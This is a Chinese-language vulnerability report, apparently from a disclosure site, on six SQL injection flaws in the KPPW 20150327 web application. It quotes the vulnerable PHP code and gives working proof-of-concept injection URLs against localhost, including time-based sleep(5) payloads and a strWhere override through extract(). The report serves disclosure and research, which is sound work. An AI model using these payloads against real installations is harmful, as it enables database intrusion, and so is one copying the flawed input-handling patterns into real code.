### 简要描述: 洞太多啦 ### 详细说明: KPPW 最新版20150327 第一处注入: 漏洞文件:/control/tasklist.php ``` $m = intval($m); $i = intval($i); $s = intval($s); $r = intval($r); $o = intval($o); $pd = intval($pd); ``` ``` $m and $strUrl .="&m=".$m; $s and $strUrl .="&s=".$s; $r and $strUrl .="&r=".$r; $i and $strUrl .="&i=".$i; $pd and $strUrl .="&pd=".$pd; $o and $strUrl .="&o=".$o; $p and $strUrl .="&p=".intval($p); $ky and $strUrl .="&ky=".$ky; ``` 2处代码未对$p 参数进行intval ``` if (intval ( $p )) { $strWhere .= " and a.province = ".intval($p); $two=db_factory::get_table_data("*","witkey_district","upid=".$p); } ``` intval判断 轻松绕过造成注入 证明: http://127.0.0.1/kppw0327/index.php?do=tasklist&m=2&s=2&r=2&o=5&p=1 || sleep(5) [<img src="https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png) 第二处注入: /control/goodslist.php ``` $m and $strUrl...
### 简要描述:

洞太多啦

### 详细说明:

KPPW 最新版20150327

第一处注入:

漏洞文件:/control/tasklist.php

```
$m = intval($m);
$i = intval($i);
$s = intval($s);
$r = intval($r);
$o = intval($o);
$pd = intval($pd);
```

```
$m and $strUrl .="&m=".$m;
$s and $strUrl .="&s=".$s;
$r and $strUrl .="&r=".$r;
$i and $strUrl .="&i=".$i;
$pd and $strUrl .="&pd=".$pd;
$o and $strUrl .="&o=".$o;
$p and $strUrl .="&p=".intval($p);
$ky and $strUrl .="&ky=".$ky;
```

2处代码未对 $p 参数进行 intval：

```
if (intval ( $p )) {
    $strWhere .= " and a.province = ".intval($p);
    $two=db_factory::get_table_data("*","witkey_district","upid=".$p);
}
```

这里 intval($p) 只用作 if 的条件判断，真正拼入 upid= 条件的仍是未经处理的原始 $p，只要 $p 以数字开头即可通过判断，intval 判断因此被轻松绕过，造成注入。

证明:

http://127.0.0.1/kppw0327/index.php?do=tasklist&m=2&s=2&r=2&o=5&p=1 || sleep(5)

[<img src="https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png)

第二处注入:

/control/goodslist.php

```
$m and $strUrl .="&m=".intval($m);
$intPage and $strUrl .="&intPage=".intval($intPage);
$i and $strUrl .="&i=".intval($i);
$pd and $strUrl .="&pd=".intval($pd);
$o and $strUrl .="&o=".strval($o);
$p and $strUrl .="&p=".intval($p);
$ky and $strUrl .="&ky=".$ky;
```

$p 参数依然没有 intval：

```
if (intval ( $p )) {
    $strWhere .= " and a.province = ".intval($p);
    $two=db_factory::get_table_data("*","witkey_district","upid=".$p);
}
```

同样造成注入

证明:

http://127.0.0.1/kppw0327/index.php?do=goodslist&m=2&s=2&r=2&o=5&p=1 || 1=sleep(5)

[<img src="https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg)

第三处注入:

漏洞文件同上

```
if (intval ( $twoid )) {
    $arrCitytwo = CommonClass::getDistrictById($twoid);
    $strWhere .= " and a.city = ".intval($twoid);
    $three=db_factory::get_table_data("*","witkey_district","upid=".$twoid);
    $twoid and $strUrl .="&twoid=".intval($twoid);
}
```
与前两处类似：intval($twoid) 只用作条件判断，拼入 upid= 条件的仍是原始的 $twoid。

证明:

http://127.0.0.1/kppw0327/index.php?do=goodslist&m=7&m=0&twoid=1xxx

[<img src="https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg)

### 漏洞证明:

第四处:

漏洞文件:/control/ajax/balance.php

```
$id=intval($id);
$orderId=intval($orderId);
$arrMemer=db_factory::get_one("select * from ".TABLEPRE."witkey_member where uid=".$gUid);
$twoPassword = keke_user_class::get_password ( $arrMemer['password'], $arrMemer['rand_code'] );
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
    $sec_code=kekezu::escape(trim($zfpwd));
    $strMd5Pwd = keke_user_class::get_password ( $sec_code, $gUserInfo ['rand_code'] );
    $arrUserInfo=db_factory::get_one(sprintf("select * from %switkey_space where uid=%d and sec_code='%s'",TABLEPRE,intval($gUid),$strMd5Pwd));
    switch ($type){
        case 'task':
            $fina_type="pub_".$type;
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=task&id='.intval($id);
            $strwzfUrl='index.php?do=yepay&type='.$type.'&id='.intval($id);
            $strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'";
            break;
        case 'goods':
            $fina_type="buy_service";
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=goods&id='.intval($id);
            $strwzfUrl='index.php?do=order&sid='.$id.'&step=step2&orderId='.$orderId.'&action=confirm_pay';
            $strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'";
            break;
        case 'service':
            $fina_type="buy_service";
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=goods&id='.intval($id);
            $strwzfUrl='index.php?do=order&sid='.$id.'&step=step3&orderId='.$orderId.'&action=pay';
            $strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." 
and fina_action='.$fina_type.'";
            break;
        case 'pubservice':
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=goods&id='.intval($id);
            $strwzfUrl='index.php?do=yepay&type=service&id='.intval($id)."&orderId=".$orderId;
            $strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'";
            break;
        case 'gy':
            $fina_type="buy_gy";
            $tips['errors']['zfpwd'] = '你已经支付成功了,不需要再次支付!';
            $stryzfUrl=NULL;
            $strwzfUrl='index.php?do=gy&id='.$id.'&step=step3&orderId='.$orderId.'&action=pay';
            $strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'";
            break;
        case 'taskCash':
            $fina_type="hosted_reward";
            $tips='你已经支付成功了,不需要再次支付!';
            $stryzfUrl='index.php?do=task&id='.intval($id);
            $strwzfUrl="index.php?do=taskhandle&op=consign&taskId=".$id;
            $strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'";
            break;
    }
    if($arrUserInfo && $type){
        $arrFinance=db_factory::get_one($strSql);
        if($arrFinance){
            kekezu::show_msg($tips,$stryzfUrl,'','','success');
```

还是先看下 kppw 的参数获取方式：

```
$_R = $_REQUEST;
$_R = kekezu::k_input ( $_R );
$_GET = kekezu::k_input($_GET);
$_POST = kekezu::k_input($_POST);
$_R and extract ( $_R, EXTR_SKIP );
```

可以看到 $strSql 只在各个 case 中赋值，而 switch 没有 default 分支，贴出的代码在 switch 之前也没有给 $strSql 赋值。如果我们传入的 $type=xxx 进入了 switch 却不匹配任何一个 case，脚本本身就不会给 $strSql 赋值；而 extract($_R, EXTR_SKIP) 只跳过已经存在的变量，因此可以自己传入 $strSql 参数，它会原样成为 $strSql 变量。

```
$arrFinance=db_factory::get_one($strSql);
```

在这里进入查询。

证明:

此处需注册个账号，支付密码也得填你自己真正的支付密码，即可。

[<img src="https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png)

第五处注入:

漏洞文件:/control/ajax/banner.php

```
if($_R['a']==1){
    $arr['shop_background']="";
    db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']);
    kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok');
}elseif($_R['a']==2){
    $arr['banner']="";
    db_factory::updatetable(TABLEPRE."witkey_shop", $arr, 
"uid=".$_R['id']); kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok'); } ``` a 为1或2 都行 $_R['id'] 直接放入查询 证明: http://127.0.0.1/kppw0327/index.php?do=ajax&view=banner&a=1&id=1xxxx [<img src="https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png) 第六处注入: 漏洞文件:/control/articlelist.php ``` <?php defined ( 'IN_KEKE' ) or exit ( 'Access Denied' ); $strNavActive = 'articlelist'; $strUrl = $_K['siteurl']."/index.php?do=articlelist"; $catid and $strUrl .="&catid=".intval($catid); $intPage and $strUrl .="&intPage=".$intPage; $arrArtCats = kekezu::get_table_data ( "*", "witkey_article_category", "cat_type='article' and art_cat_pid=1", "listorder asc", "", "", "", null ); $page and $intPage = intval($page); $intPage = intval ( $intPage ) ? $intPage : 1; $intPagesize = intval ( $intPagesize ) ? $intPagesize : 20; intval($catid) and $intCatid = intval($catid) or $intCatid = intval($arrArtCats['0']['art_cat_id']); $intCatid and $strWhere .= " and a.art_cat_id = $intCatid"; $strWhere.=" and a.is_show!=2"; $strWhere .=" order by is_recommend desc,a.listorder asc,pub_time desc"; $strSql = "select a.* ,b.cat_name from " . TABLEPRE . "witkey_article a left join " . TABLEPRE . "witkey_article_category b on a.art_cat_id=b.art_cat_id where b.cat_type='article' $strWhere"; ``` $strWhere第一次出现都是 $strWhere .= 来添加 未见到定义 那么可以直接传入初始值 后面都是 .= 添加 无影响 证明: http://127.0.0.1/kppw0327/index.php?do=articlelist&strWhere=%20and%201=1%23 [<img src="https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg)